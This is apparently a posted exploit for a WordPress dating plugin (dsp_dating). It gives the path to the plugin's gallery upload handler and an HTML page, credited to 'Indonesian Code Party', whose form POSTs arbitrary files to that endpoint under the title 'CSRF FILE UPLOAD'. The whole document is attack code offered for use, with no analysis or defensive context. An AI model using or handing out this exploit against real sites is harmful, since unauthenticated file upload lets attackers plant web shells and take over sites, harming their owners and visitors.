exploit
/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/
<html><head><title>Wordpress Plugins DSP_DATING CSRF FILE UPLOAD</title>
</head><body bgcolor="white" class="intent-mouse"><center> <h1>Wordpress Plugins DSP_DATING CSRF FILE UPLOAD</h1><h1>
<font color="black"> <form method="POST" action="/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/" enctype="multipart/form-data"> <input type="file" name="files[]"><br> <input type="albumId" name="albumId"><br> <input type="submit" name="Submit" value="Upload ?"> <center><h5></h5>© Indonesian Code Party <h5></h5> </center></form></font></h1></center>
</body></html>